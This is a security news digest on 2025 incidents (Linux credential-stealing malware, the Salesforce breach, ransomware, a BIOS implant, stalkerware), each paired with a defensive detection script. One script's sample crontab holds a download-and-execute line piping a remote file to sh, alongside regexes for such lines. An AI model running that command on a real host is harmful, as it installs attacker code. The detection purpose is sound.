SparTech Software CyberPulse – Your quick strike cyber update for August 5, 2025 10:41 AM

Dangerous New Linux Malware Infests Thousands, Steals Credentials

A newly discovered Linux malware campaign is actively infecting thousands of machines worldwide, giving attackers a channel to exfiltrate users' passwords and other sensitive personal data. The campaign is ongoing, and its victim base spans both individuals and organizations, which is why it has drawn significant concern.

Technical Overview of the Malware

Security researchers report that the malware is built specifically for Linux environments. It typically gains entry by exploiting unpatched vulnerabilities in Internet-facing web servers and cloud-hosted Linux systems. Once installed, it establishes persistence by modifying system startup scripts and adding cron jobs, so it is relaunched after a reboot or after a service is restarted.

Credential Theft and Data Exfiltration

The malware targets login credentials, SSH keys, browser-stored passwords, and sensitive files in users' home directories. It uses memory scraping and keylogging to capture input in real time, then transmits the harvested data to remote attacker-controlled servers. The exfiltration channel is encrypted, which hides the stolen content from network inspection and complicates forensic reconstruction; the connection itself is still visible, which is why unusual outbound traffic remains a useful indicator.

Detection Evasion and Persistence

To avoid detection by common security tools, the malware renames its processes to resemble legitimate ones and injects itself into legitimate system binaries. It also disables certain security services and truncates log files to cover its tracks. Operators push updates over the command-and-control channel, changing signatures and tactics as security vendors attempt to counter the campaign.

Scope of the Impact and Response Recommendations

With thousands of infected endpoints already confirmed, the attack is considered one of the most significant Linux-based credential theft operations seen in 2025. Security experts urge organizations to patch all exposed systems, monitor for unusual outbound connections, review authentication logs for logins that reuse stolen passwords or SSH keys, and deploy endpoint security capable of heuristic and behavioral analysis to catch new variants.
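The persistence and process-renaming behaviours described above can be triaged with a short host-side script. The following is an added example written for this page, not code from the article or from the researchers who analysed the malware. The crontab text and the process snapshot are constructed so the script runs offline; the heuristics (download-and-execute cron lines, binaries in world-writable directories, a userland process wearing a kernel-thread name) are the generic checks an incident responder would run, not indicators taken from the campaign.

```python
"""Triage helpers for Linux cron persistence and process masquerading.
Added example; inputs are constructed inline and labelled as such."""
import os
import re
from pathlib import Path

# Constructed /etc/crontab with two injected entries (lines 4 and 5).
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 *   * * *   root    curl -s http://198.51.100.7/x | sh >/dev/null 2>&1
@reboot         root    /dev/shm/.cache/kthreadd
"""

# Constructed snapshot of /proc/<pid>/comm and readlink(/proc/<pid>/exe).
# Real kernel threads have no exe link at all; a userland binary calling
# itself "kworker" is the masquerade the article describes.
SAMPLE_PROCS = [
    {"pid": 812,  "comm": "sshd",      "exe": "/usr/sbin/sshd"},
    {"pid": 1331, "comm": "kworker/0", "exe": "/dev/shm/.cache/kthreadd"},
    {"pid": 2044, "comm": "bash",      "exe": "/usr/bin/bash"},
]

SUSPICIOUS_CRON = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download-and-execute"),
    (re.compile(r"base64\s+(-d|--decode)"),          "decodes an embedded payload"),
    (re.compile(r"/(dev/shm|tmp|var/tmp)/"),         "runs from a world-writable directory"),
]
KERNEL_THREAD_NAMES = ("kworker", "kthreadd", "ksoftirqd", "migration/", "rcu_")
WRITABLE_DIRS = ("/dev/shm/", "/tmp/", "/var/tmp/")


def flag_cron_lines(crontab: str) -> list:
    """Return (line_no, reason, entry) for cron entries matching a heuristic."""
    findings = []
    for n, line in enumerate(crontab.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS_CRON:
            if pattern.search(entry):
                findings.append((n, reason, entry))
                break
    return findings


def flag_processes(procs: list) -> list:
    """Return (pid, reason, comm, exe) for processes whose name does not fit
    their executable. comm holds at most 15 characters, so compare prefixes."""
    findings = []
    for p in procs:
        comm, exe = p["comm"], p["exe"]
        base = Path(exe).name if exe else ""
        if exe and comm.startswith(KERNEL_THREAD_NAMES):
            reason = "kernel-thread name on a userland process"
        elif exe and not (base.startswith(comm) or comm.startswith(base[:15])):
            reason = "comm does not match exe basename"
        elif exe.startswith(WRITABLE_DIRS):
            reason = "executable lives in a world-writable directory"
        else:
            continue
        findings.append((p["pid"], reason, comm, exe))
    return findings


def snapshot_live_processes() -> list:
    """Collect the same fields from a live /proc (Linux only; reading other
    users' exe links needs root). Exited processes are skipped."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            comm = Path(f"/proc/{pid}/comm").read_text().strip()
        except OSError:
            continue
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            exe = ""  # kernel thread or permission denied
        procs.append({"pid": int(pid), "comm": comm, "exe": exe})
    return procs


if __name__ == "__main__":
    for hit in flag_cron_lines(SAMPLE_CRONTAB) + flag_processes(SAMPLE_PROCS):
        print(hit)
```

On a real host, replace the constructed data with `Path("/etc/crontab").read_text()` (plus the files under /etc/cron.d and each user's crontab) and `snapshot_live_processes()`. The comm-versus-exe comparison is deliberately loose: interpreters and long binary names legitimately differ from comm, so treat a hit as a lead to inspect, not a verdict.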

ShinyHunters Behind Major Salesforce Data Breach

The notorious hacking collective ShinyHunters has claimed responsibility for a significant data breach at Salesforce, compromising a large volume of sensitive information. This incident marks another large-scale attack by the group, which is known for targeting prominent cloud-service providers and thereby exposing those providers' clients to downstream risk.

Details of the Breach and Exposed Data

According to incident responders, ShinyHunters exploited misconfigured application interfaces and used social engineering to gain access to privileged Salesforce environments. From there the attackers extracted customer records, internal communications, proprietary financial information, and extensive metadata on Salesforce users and API activity.

Methodology and Attack Lifecycle

The attackers opened the campaign with phishing emails crafted to mimic trusted internal communications. Once credentials were harvested, they moved laterally to gain deep access across multiple Salesforce data repositories, used enumeration scripts to locate the most valuable datasets, and then mass-exfiltrated them to offsite locations under their control.

Implications for Salesforce Clients

Salesforce clients are advised to review account access logs for suspicious activity and to reset database and application credentials immediately. Third-party integrations, especially connected apps granted broad API permissions, should be audited for unauthorized changes or access events. Industry insiders warn that the exposed data could fuel future social engineering, fraud, or extortion campaigns.
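The two audits recommended above, reviewing integration grants and reviewing access logs, can be scripted against exports of the tenant's data. The following is an added example for this page, not Salesforce code and not tooling from the incident response. The record layout is an assumption (modelled loosely on a login-history export and a connected-app inventory), the approved-app allowlist and admin list are placeholders, and every record is constructed. The scope names `full`, `api` and `refresh_token` are real Salesforce OAuth scopes; the rest of the data is invented for the example.

```python
"""Audit of connected-app grants and login history.
Added example; record layout assumed, data constructed."""
from collections import defaultdict

# Integrations IT actually deployed (assumed allowlist).
APPROVED_APPS = {"Salesforce for Outlook", "Marketing Sync"}
# OAuth scopes that let an app read or export arbitrary data.
BROAD_SCOPES = {"full", "api", "refresh_token"}

# Constructed connected-app inventory.
CONNECTED_APPS = [
    {"name": "Marketing Sync", "scopes": {"api", "refresh_token"},
     "ip_relaxed": False, "installed_by": "admin@example.com"},
    {"name": "Data Loader v2 Helper", "scopes": {"full", "refresh_token"},
     "ip_relaxed": True, "installed_by": "jsmith@example.com"},
]

# Constructed login-history rows.
LOGINS = [
    {"user": "jsmith@example.com", "app": "Browser", "ip": "203.0.113.5",
     "status": "Success", "ts": "2025-08-01T09:02:00Z"},
    {"user": "jsmith@example.com", "app": "Data Loader v2 Helper", "ip": "198.51.100.20",
     "status": "Success", "ts": "2025-08-01T09:40:00Z"},
    {"user": "jsmith@example.com", "app": "Data Loader v2 Helper", "ip": "198.51.100.21",
     "status": "Success", "ts": "2025-08-01T09:41:00Z"},
    {"user": "mlee@example.com", "app": "Marketing Sync", "ip": "203.0.113.9",
     "status": "Success", "ts": "2025-08-01T10:00:00Z"},
]


def audit_connected_apps(apps, approved=APPROVED_APPS, admins=("admin@example.com",)):
    """Return (app_name, [reasons]) for grants that deserve review."""
    findings = []
    for app in apps:
        reasons = []
        if app["name"] not in approved:
            reasons.append("not in approved integration inventory")
        if app["scopes"] & BROAD_SCOPES and app["ip_relaxed"]:
            reasons.append("broad OAuth scopes without IP restriction")
        if app["installed_by"] not in admins:
            reasons.append("authorized by a non-admin user")
        if reasons:
            findings.append((app["name"], reasons))
    return findings


def audit_logins(logins, approved=APPROVED_APPS, max_ips=2):
    """Return (timestamp, user, detail) for API logins through unapproved
    apps and for users seen from more than max_ips source addresses."""
    findings = []
    ips_by_user = defaultdict(set)
    for row in logins:
        ips_by_user[row["user"]].add(row["ip"])
        if (row["status"] == "Success" and row["app"] != "Browser"
                and row["app"] not in approved):
            findings.append((row["ts"], row["user"],
                             "API login via unapproved app " + row["app"]))
    for user, ips in ips_by_user.items():
        if len(ips) > max_ips:
            findings.append(("*", user, f"logins from {len(ips)} distinct IPs"))
    return findings


if __name__ == "__main__":
    for hit in audit_connected_apps(CONNECTED_APPS) + audit_logins(LOGINS):
        print(hit)
```

Any app flagged as both unapproved and holding broad scopes should have its grant revoked and its refresh tokens invalidated before credentials are rotated; rotating passwords alone does nothing against a still-valid OAuth refresh token.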

Ongoing Investigation and Remediation Steps

Salesforce has engaged digital forensics teams and law enforcement while rolling out emergency security patches. All affected stakeholders have been notified, and threat intelligence feeds are being updated with new indicators of compromise associated with the ShinyHunters’ tooling and infrastructure.

SafePay Ransomware Threatens to Leak 35TB from Ingram Micro

The SafePay ransomware gang has announced it is holding 35 terabytes of sensitive data stolen from global IT distributor Ingram Micro, threatening public disclosure unless a substantial ransom is paid. The incident highlights escalating risks as ransomware operators leverage sheer data volume to exert decisive pressure on large enterprises.

Initial Attack and Ransom Demands

The attack reportedly began when SafePay affiliates exploited a zero-day vulnerability in Ingram Micro's remote access infrastructure. After securing a foothold in the internal network, the attackers rapidly deployed encryption payloads across file servers and backup systems while, in parallel, moving terabytes of files to attacker-controlled cloud storage.

Leaked Data Contents and Threats

The gang claims the stolen 35TB includes internal financial records, employee PII, customer contact lists, procurement documents, and confidential business communications. SafePay published several proof-of-theft samples to a leak site and warned that the full dataset will be released to the public and criminal actors unless the company meets their monetary demands within a defined deadline.

Response from Ingram Micro and Law Enforcement

Ingram Micro is working with incident response consultants and law enforcement to validate the breach, secure remaining systems, and assess legal ramifications. The company urges affected partners to be vigilant for follow-on phishing or fraud attempts that may leverage exfiltrated data.

Shade BIOS Attack Defeats Endpoint Security Measures

Security researchers have disclosed a technique dubbed the Shade BIOS attack, which they say bypasses every class of current commercial endpoint security product. The approach manipulates the computer's firmware so that malware executes beneath the operating system, where disk encryption and OS-level behavioral defenses cannot observe it.

How Shade BIOS Works

The attack abuses firmware update mechanisms on consumer and enterprise motherboards to write malicious code into the BIOS flash storage. On the next restart the compromised firmware executes the attacker's code before the OS boots, giving it deep control of the system. Because the implant lives in flash rather than on disk, it survives hard drive wipes and full reinstalls.

Impact and Detection Challenges

Shade BIOS grants attackers root-level access, enabling them to disable OS-level protections, intercept user input, and backdoor operating system components before boot. Traditional antivirus, EDR, and even hardware monitoring tools cannot detect the threat; doing so requires specialized firmware integrity checks (comparing measured boot values or a flash dump against a known-good baseline) or chip-level inspection.

Emergency Mitigation Approaches

Security vendors are rushing to develop firmware verification tools. In the meantime, organizations are advised to apply vendor-provided platform firmware updates, restrict physical and remote access to low-level management interfaces, and actively monitor for unexpected firmware alterations.
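One concrete form of the firmware integrity check mentioned above is to compare the TPM's boot measurements with a baseline recorded when the platform was known to be clean: PCR0 extends over the platform firmware code, so a modified BIOS image produces a different PCR0 on the next boot, and PCR7 covers the Secure Boot policy. The script below is an added example for this page, not the researchers' tooling. It assumes the text layout produced by `tpm2_pcrread sha256:0,7` (index, colon, 0x-prefixed digest); the digests themselves are constructed stand-ins, not real PCR values.

```python
"""Compare TPM PCR values against a known-good baseline.
Added example; pcrread layout assumed, digests constructed."""
import hashlib
import re


def h(label: str) -> str:
    """Stand-in digest so the example has deterministic 64-hex values."""
    return hashlib.sha256(label.encode()).hexdigest()


# Baseline taken from a trusted host on the current firmware version.
# PCR0: platform firmware code. PCR7: Secure Boot policy and keys.
GOLDEN_PCRS = {0: h('golden-firmware'), 7: h('golden-secureboot')}

# Constructed reading from a host whose firmware was modified: PCR0 drifted.
SAMPLE_PCRREAD = f"""\
sha256:
  0 : 0x{h('modified-firmware').upper()}
  7 : 0x{h('golden-secureboot').upper()}
"""

PCR_LINE = re.compile(r"^\s*(\d+)\s*:\s*0x([0-9A-Fa-f]{64})\s*$")


def parse_pcrread(text: str) -> dict:
    """Return {pcr_index: lowercase_hex_digest} from tpm2_pcrread-style text."""
    pcrs = {}
    for line in text.splitlines():
        m = PCR_LINE.match(line)
        if m:
            pcrs[int(m.group(1))] = m.group(2).lower()
    return pcrs


def compare_pcrs(current: dict, golden: dict) -> dict:
    """Return {pcr: (expected, observed)} for every baseline PCR that
    drifted or is missing from the reading (observed is None if missing)."""
    drift = {}
    for idx, expected in golden.items():
        observed = current.get(idx)
        if observed != expected:
            drift[idx] = (expected, observed)
    return drift


def firmware_image_matches(image: bytes, vendor_sha256: str) -> bool:
    """Compare a dumped SPI flash image against a vendor-published hash."""
    return hashlib.sha256(image).hexdigest() == vendor_sha256.lower()


if __name__ == "__main__":
    drift = compare_pcrs(parse_pcrread(SAMPLE_PCRREAD), GOLDEN_PCRS)
    for idx, (expected, observed) in drift.items():
        shown = (observed or "missing")[:12]
        print(f"PCR{idx} drifted: expected {expected[:12]}..., observed {shown}...")
```

Two caveats apply in practice. A legitimate firmware update also changes PCR0, so the baseline must be re-captured after every approved update and the check reads as "unexpected change", not "compromise". And the PCR values must come from a TPM quote or an out-of-band reading, since firmware that already controls the boot path could tamper with what the OS is shown; this is why the article pairs integrity checks with chip-level inspection.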

Catwatchful Spyware Exploits Google Firebase, Data Leak Follows Late Takedown

A significant spyware campaign operated by Catwatchful used Google Firebase infrastructure to exfiltrate large volumes of private data from Android devices. The operator's own mismanagement, compounded by a slow platform response, then turned the spyware's backend into a major data leak.

Firebase Abuse Enables Data Harvesting

Catwatchful packaged its spyware as a parental-control application for Android that secretly recorded victims' texts, photos, audio, and GPS location. Using Firebase as the cloud backend gave the operators reliable data offloading and storage, and because the traffic goes to a widely used Google service it blends in with legitimate app traffic, bypassing some traditional network-based defenses.

Security Lapses and Data Leak

Security researcher Eric Daigle discovered a critical misconfiguration: the Catwatchful backend left more than 62,000 customer email addresses and plaintext passwords publicly accessible, along with surveillance records from over 26,000 victim devices. The operator also failed to notify users after being alerted, deepening the privacy impact of the breach.
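A backend that is "publicly accessible" on Firebase is, in the common case, a Realtime Database whose security rules grant read or write access to everyone. The following is an added example for this page, not Catwatchful's configuration and not Google tooling; the three rule documents are constructed to show the open pattern, an owner-scoped hardened pattern, and the in-between mistake of trusting any signed-in account. The audit walks a rules document and reports each risky grant with its path.

```python
"""Static audit of Firebase Realtime Database security rules.
Added example; all rule documents are constructed."""
import json

# Open to the world. Rules cascade downward, so a root-level ".read": true
# exposes every path in the database to unauthenticated clients.
WEAK_RULES = json.dumps({"rules": {".read": True, ".write": True}})

# Any signed-in account can read victim records: still a leak, since
# anyone can create an account.
ANY_AUTH_RULES = json.dumps({"rules": {"victims": {
    ".read": "auth != null",
    ".write": "auth != null && auth.uid == $uid",
}}})

# Owner-scoped: only the signed-in user may touch their own record.
HARDENED_RULES = json.dumps({"rules": {"users": {"$uid": {
    ".read": "auth != null && auth.uid == $uid",
    ".write": "auth != null && auth.uid == $uid",
}}}})


def audit_rules(rules_json: str) -> list:
    """Return (path, permission, severity, detail) for risky grants."""
    findings = []

    def classify(path, perm, value):
        where = path or "/"
        if value is True or (isinstance(value, str) and value.strip() == "true"):
            findings.append((where, perm, "critical",
                             "granted to everyone, including unauthenticated clients"))
        elif isinstance(value, str) and "auth != null" in value and "auth.uid" not in value:
            findings.append((where, perm, "warning",
                             "granted to any signed-in account, not scoped to the owner"))

    def walk(node: dict, path: str):
        for key, value in node.items():
            if key in (".read", ".write"):
                classify(path, key, value)
            elif isinstance(value, dict):
                walk(value, f"{path}/{key}")

    walk(json.loads(rules_json).get("rules", {}), "")
    return findings


if __name__ == "__main__":
    for name, doc in [("weak", WEAK_RULES), ("any-auth", ANY_AUTH_RULES),
                      ("hardened", HARDENED_RULES)]:
        print(name, audit_rules(doc))
```

The rule text is what the Firebase console and CLI use for the Realtime Database; Cloud Firestore uses a different rules language, so this walker does not apply there. Fixing the rules is only half of the remediation the article implies: passwords stored in plaintext stay exposed to anyone who already pulled the data, so they need to be reset and stored hashed going forward.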

Industry Reaction to Platform Response

Although Google eventually shut down Catwatchful's Firebase account, the delay drew criticism over slow enforcement of anti-abuse policies. Experts pointed to the case as another illustration of how poor stalkerware security not only endangers the people being surveilled but also exposes the spyware's own customers to further predation through data breaches.

Chaos Ransomware Linked to BlackSuit Group Emerges with Sophisticated Tactics

A newly identified ransomware-as-a-service operation, dubbed Chaos, has been observed targeting organizations across Windows, Linux, NAS, and ESXi environments. Researchers suspect the group consists of former members of the dismantled BlackSuit gang, now combining social engineering with hands-on network exploitation.

Attack Techniques and Ransom Negotiations

Chaos operators initiate attacks with large-scale spam campaigns, followed by vishing (voice phishing) calls that talk the target into granting remote access. Persistence is established by abusing remote monitoring and management (RMM) tools, lateral movement is aided by legitimate file-sharing software, and stolen data is exfiltrated to attacker-controlled nodes before the ransomware is deployed.

Service Model and “Penetration Overview”

Unusually, Chaos offers victims a "penetration overview": a detailed report describing how their environment was breached, including kill-chain details and remediation guidance, delivered only after the ransom is paid. Most victims to date are U.S.-based, and analysis suggests the group uses automated tooling to maximize attack velocity across diverse environments.

Recommended Defenses

Security experts advise tightening access controls, enforcing multi-factor authentication, closely monitoring RMM tool use (in particular, alerting on any RMM tool that is not part of the approved inventory), and conducting regular security awareness training to blunt the social engineering entry point. Early detection through network anomaly monitoring remains critical.
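The RMM monitoring advised above comes down to one question per process-creation event: is this remote-access tool the one IT deployed, installed where IT installs things, and started by something other than a mail client or browser? The script below is an added example for this page, not Chaos tooling and not any vendor's detection content. The event fields are modelled on a process-creation log but are an assumption, the events are constructed, the approved inventory is a placeholder, and the binary names are illustrative of widely used remote-access tools rather than a list the article provides.

```python
"""Triage process-creation events for unapproved RMM tool launches.
Added example; event layout assumed, events constructed."""

# Illustrative remote-access binaries, not a list from the article.
RMM_BINARIES = {
    "anydesk.exe", "teamviewer.exe",
    "screenconnect.clientservice.exe", "screenconnect.windowsclient.exe",
}
APPROVED_RMM = {"teamviewer.exe"}  # what IT actually deploys (assumption)
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\")
USER_FACING_PARENTS = {"outlook.exe", "chrome.exe", "msedge.exe",
                       "firefox.exe", "explorer.exe"}

# Constructed process-creation events.
EVENTS = [
    {"host": "WS-07", "user": "CORP\\jdoe",
     "image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "parent": r"C:\Windows\System32\services.exe"},
    {"host": "WS-07", "user": "CORP\\jdoe",
     "image": r"C:\Users\jdoe\Downloads\AnyDesk.exe",
     "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"host": "WS-12", "user": "CORP\\mlee",
     "image": r"C:\Users\mlee\AppData\Local\Temp\ScreenConnect.ClientService.exe",
     "parent": r"C:\Windows\System32\msiexec.exe"},
    {"host": "WS-12", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_rmm_events(events, approved=APPROVED_RMM) -> list:
    """Return (host, user, image, [reasons]) for RMM launches worth a ticket.
    Non-RMM processes are ignored; an approved tool from its installed
    location with a service parent produces no finding."""
    findings = []
    for ev in events:
        image = basename(ev["image"])
        if image not in RMM_BINARIES:
            continue
        reasons = []
        if image not in approved:
            reasons.append("RMM tool not in approved inventory")
        if any(seg in ev["image"].lower() for seg in USER_WRITABLE):
            reasons.append("runs from a user-writable path, not an installed location")
        if basename(ev["parent"]) in USER_FACING_PARENTS:
            reasons.append("launched by a mail client or browser (likely fresh download)")
        if reasons:
            findings.append((ev["host"], ev["user"], ev["image"], reasons))
    return findings


if __name__ == "__main__":
    for host, user, image, reasons in triage_rmm_events(EVENTS):
        print(f"{host} {user}: {image}")
        for r in reasons:
            print("   -", r)
```

The second and third constructed events are the vishing pattern the article describes: a user is talked into downloading a remote-access client, which then runs from Downloads or Temp under a browser or installer parent. Matching on file name alone is easy to evade by renaming, so in production pair this with the signer name or file hash; the heuristic here is the triage layer, not the only control.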
